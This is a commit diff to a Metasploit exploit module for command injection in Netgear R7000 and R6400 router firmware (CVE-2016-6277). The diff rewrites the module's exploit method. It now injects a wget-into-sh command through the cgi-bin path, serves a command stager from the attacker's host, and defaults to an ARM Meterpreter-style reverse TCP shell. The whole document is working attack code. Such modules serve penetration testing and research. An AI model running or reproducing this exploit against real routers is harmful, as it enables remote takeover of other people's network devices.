Merge pull request #1 from wvu-r7/pr/7968

Convert to CmdStager for R7000 exploit

Author: cbrnrd

modules/exploits/linux/http/netgear_r7000_cgibin_exec.rb

@@ -6,9 +6,11 @@
 require 'msf/core'
 
 class MetasploitModule < Msf::Exploit::Remote
+
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,
@@ -18,11 +20,11 @@ def initialize(info = {})
         Netgear R7000 and R6400 router firmware version 1.0.7.2_1.1.93 and possibly earlier.
       },
       'License'              => MSF_LICENSE,
-      'Platform'             => 'unix',
+      'Platform'             => 'linux',
       'Author'               => ['thecarterb', 'Acew0rm'],
       'DefaultTarget'        => 0,
-      'Privileged'           => false,
-      'Arch'                 => [ARCH_CMD],
+      'Privileged'           => true,
+      'Arch'                 => ARCH_ARMLE,
       'Targets'              => [
         [ 'Automatic Target', { } ]
       ],
@@ -35,20 +37,19 @@ def initialize(info = {})
           [ 'CVE', '2016-6277']
         ],
       'DisclosureDate' => 'Dec 06 2016',
-      'Payload'        =>
+      'DefaultOptions'  =>
         {
-          'Space'       => 1024,
-          'DisableNops' => true,
-          'BadChars'    => "\x20"
-        },
-      'DefaultOptions'  => { 'WfsDelay' => 10}
+          'PAYLOAD' => 'linux/armle/mettle_reverse_tcp'
+        }
     ))
 
     register_options(
       [
         Opt::RPORT(80)
       ], self.class)
-    end
+
+    deregister_options('URIPATH')
+  end
 
   def scrape(text, start_trig, end_trig)
     text[/#{start_trig}(.*?)#{end_trig}/m, 1]
@@ -80,24 +81,29 @@ def check
   end
 
   def exploit
-    check
-
-    pe = payload.encoded
-    pe.to_s
-    pe.gsub!('{','')
-    pe.gsub!('}','')
+    return if check == CheckCode::Safe
 
-    #cmd = payload.encoded.unpack("C*").map{|c| "\\x%.2x" % c}.join
-    #str = "echo$IFS-ne$IFS\"#{cmd}\"|/bin/sh&"
+    @cmdstager = generate_cmdstager(flavor: :wget).join(';')
 
-    print_status('Sending encoded command...')
-    vprint_status("Encoded command: #{pe}")
-    send_request_cgi({
-        'uri' => "/cgi-bin/;#{pe}",
-        'method' => 'GET'
- })
+    send_request_cgi(
+      'method' => 'GET',
+      'uri'    => "/cgi-bin/;wget$IFS-O-$IFS'#{srvhost_addr}:#{srvport}'|sh"
+    )
+  end
 
-    print_status('Giving the handler time to run...')
+  # Return CmdStager on first request, payload on second
+  def on_request_uri(cli, request)
+    if @cmdstager
+      send_response(cli, @cmdstager)
+      @cmdstager = nil
+    else
+      super
+    end
+  end
 
+  # XXX: This is the only way to force this resource
+  def resource_uri
+    '/'
   end
+
 end